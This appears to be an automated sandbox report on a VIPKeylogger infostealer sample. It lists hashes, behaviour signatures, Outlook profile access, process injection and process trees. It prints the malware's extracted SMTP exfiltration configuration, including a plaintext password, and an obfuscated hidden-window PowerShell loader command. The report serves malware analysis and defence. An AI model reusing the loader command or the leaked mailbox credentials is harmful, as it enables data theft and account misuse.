Analysis
- max time kernel: 148s
- max time network: 148s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-10-2024 01:36
Static task
- static1

Behavioral tasks
- behavioral1
  Sample: 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
  Resource: win7-20240903-en
- behavioral2
  Sample: 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
  Resource: win10v2004-20241007-en
- behavioral3
  Sample: Melibiose.ps1
  Resource: win7-20240903-en
- behavioral4
  Sample: Melibiose.ps1
  Resource: win10v2004-20241007-en
General
- Target: 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
- Size: 868KB
- MD5: c676d09741d75516a52593da851f8e81
- SHA1: d240a1271f4a3a0380a550d7c34bbfc5e2f3212b
- SHA256: 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc
- SHA512: 1f032edb87bf2f7333e74e2ff997c07731974163d6e961261aee24b5e1ee6b00e3fe451c77e2983b509959d8ca86979b29796de133b1832c463894f46bae5b80
- SSDEEP: 12288:l9Aw7LtaVYyyQiZ5Q20zMETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0ma2:/AmtaVYyyQijQ9g+alCJmvulW6Nd0v2
Malware Config
Extracted: vipkeylogger
- Protocol: smtp
- Host: smtp.ionos.es
- Port: 587
- Username: [email protected]
- Password: Escaragol?24
- Email To: [email protected]
Signatures
- VIPKeylogger
  VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Runs PowerShell with a hidden display window.
  Processes (pid, process):
    2028 powershell.exe
    2252 powershell.exe
- Accesses Microsoft Outlook profiles (1 TTPs, 6 IoCs)
  Processes (description, ioc, process):
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
- Blocklisted process makes network request (16 IoCs)
  Processes (flow, pid, process):
    20 648 msiexec.exe
    21 808 msiexec.exe
    23 808 msiexec.exe
    24 648 msiexec.exe
    27 648 msiexec.exe
    28 808 msiexec.exe
    31 808 msiexec.exe
    32 648 msiexec.exe
    34 808 msiexec.exe
    35 648 msiexec.exe
    48 808 msiexec.exe
    50 808 msiexec.exe
    54 808 msiexec.exe
    55 648 msiexec.exe
    58 648 msiexec.exe
    64 648 msiexec.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, ioc):
    47 checkip.dyndns.org
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes (pid, process):
    808 msiexec.exe
    648 msiexec.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
  Processes (pid, process):
    2252 powershell.exe
    2028 powershell.exe
    648 msiexec.exe
    808 msiexec.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes (description, ioc, process):
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
- Suspicious behavior: EnumeratesProcesses (21 IoCs)
  Processes (pid, process):
    2028 powershell.exe
    2028 powershell.exe
    2252 powershell.exe
    2252 powershell.exe
    2028 powershell.exe
    2028 powershell.exe
    2028 powershell.exe
    2028 powershell.exe
    2028 powershell.exe
    2028 powershell.exe
    2252 powershell.exe
    2252 powershell.exe
    2252 powershell.exe
    2252 powershell.exe
    2252 powershell.exe
    2252 powershell.exe
    2028 powershell.exe
    808 msiexec.exe
    648 msiexec.exe
    808 msiexec.exe
    648 msiexec.exe
- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes (pid, process):
    2252 powershell.exe
    2028 powershell.exe
- Suspicious use of AdjustPrivilegeToken (46 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege  2028 powershell.exe
    Token: SeDebugPrivilege  2252 powershell.exe
    Token: SeIncreaseQuotaPrivilege  2028 powershell.exe
    Token: SeSecurityPrivilege  2028 powershell.exe
    Token: SeTakeOwnershipPrivilege  2028 powershell.exe
    Token: SeLoadDriverPrivilege  2028 powershell.exe
    Token: SeSystemProfilePrivilege  2028 powershell.exe
    Token: SeSystemtimePrivilege  2028 powershell.exe
    Token: SeProfSingleProcessPrivilege  2028 powershell.exe
    Token: SeIncBasePriorityPrivilege  2028 powershell.exe
    Token: SeCreatePagefilePrivilege  2028 powershell.exe
    Token: SeBackupPrivilege  2028 powershell.exe
    Token: SeRestorePrivilege  2028 powershell.exe
    Token: SeShutdownPrivilege  2028 powershell.exe
    Token: SeDebugPrivilege  2028 powershell.exe
    Token: SeSystemEnvironmentPrivilege  2028 powershell.exe
    Token: SeRemoteShutdownPrivilege  2028 powershell.exe
    Token: SeUndockPrivilege  2028 powershell.exe
    Token: SeManageVolumePrivilege  2028 powershell.exe
    Token: 33  2028 powershell.exe
    Token: 34  2028 powershell.exe
    Token: 35  2028 powershell.exe
    Token: 36  2028 powershell.exe
    Token: SeIncreaseQuotaPrivilege  2252 powershell.exe
    Token: SeSecurityPrivilege  2252 powershell.exe
    Token: SeTakeOwnershipPrivilege  2252 powershell.exe
    Token: SeLoadDriverPrivilege  2252 powershell.exe
    Token: SeSystemProfilePrivilege  2252 powershell.exe
    Token: SeSystemtimePrivilege  2252 powershell.exe
    Token: SeProfSingleProcessPrivilege  2252 powershell.exe
    Token: SeIncBasePriorityPrivilege  2252 powershell.exe
    Token: SeCreatePagefilePrivilege  2252 powershell.exe
    Token: SeBackupPrivilege  2252 powershell.exe
    Token: SeRestorePrivilege  2252 powershell.exe
    Token: SeShutdownPrivilege  2252 powershell.exe
    Token: SeDebugPrivilege  2252 powershell.exe
    Token: SeSystemEnvironmentPrivilege  2252 powershell.exe
    Token: SeRemoteShutdownPrivilege  2252 powershell.exe
    Token: SeUndockPrivilege  2252 powershell.exe
    Token: SeManageVolumePrivilege  2252 powershell.exe
    Token: 33  2252 powershell.exe
    Token: 34  2252 powershell.exe
    Token: 35  2252 powershell.exe
    Token: 36  2252 powershell.exe
    Token: SeDebugPrivilege  808 msiexec.exe
    Token: SeDebugPrivilege  648 msiexec.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes (description, pid, process, target process):
    PID 4560 wrote to memory of 2028  4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe  powershell.exe
    PID 4560 wrote to memory of 2028  4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe  powershell.exe
    PID 4560 wrote to memory of 2028  4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe  powershell.exe
    PID 4560 wrote to memory of 2252  4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe  powershell.exe
    PID 4560 wrote to memory of 2252  4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe  powershell.exe
    PID 4560 wrote to memory of 2252  4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe  powershell.exe
    PID 2252 wrote to memory of 648  2252 powershell.exe  msiexec.exe
    PID 2252 wrote to memory of 648  2252 powershell.exe  msiexec.exe
    PID 2252 wrote to memory of 648  2252 powershell.exe  msiexec.exe
    PID 2252 wrote to memory of 648  2252 powershell.exe  msiexec.exe
    PID 2028 wrote to memory of 808  2028 powershell.exe  msiexec.exe
    PID 2028 wrote to memory of 808  2028 powershell.exe  msiexec.exe
    PID 2028 wrote to memory of 808  2028 powershell.exe  msiexec.exe
    PID 2028 wrote to memory of 808  2028 powershell.exe  msiexec.exe
- outlook_office_path (1 IoCs)
  Processes (description, ioc, process):
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
- outlook_win_path (1 IoCs)
  Processes (description, ioc, process):
    Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe"
  PID: 4560
  Signatures:
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
  Children:
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Bittermandler=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Melibiose.Spa';$Datarepraesentation=$Bittermandler.SubString(54249,3);.$Datarepraesentation($Bittermandler)"
      PID: 2028
      Signatures:
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      Children:
        - C:\Windows\SysWOW64\msiexec.exe
          Command line: "C:\Windows\SysWOW64\msiexec.exe"
          PID: 808
          Signatures:
            - Accesses Microsoft Outlook profiles
            - Blocklisted process makes network request
            - Suspicious use of NtCreateThreadExHideFromDebugger
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Bittermandler=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Melibiose.Spa';$Datarepraesentation=$Bittermandler.SubString(54249,3);.$Datarepraesentation($Bittermandler)"
      PID: 2252
      Signatures:
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      Children:
        - C:\Windows\SysWOW64\msiexec.exe
          Command line: "C:\Windows\SysWOW64\msiexec.exe"
          PID: 648
          Signatures:
            - Accesses Microsoft Outlook profiles
            - Blocklisted process makes network request
            - Suspicious use of NtCreateThreadExHideFromDebugger
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - outlook_office_path
            - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads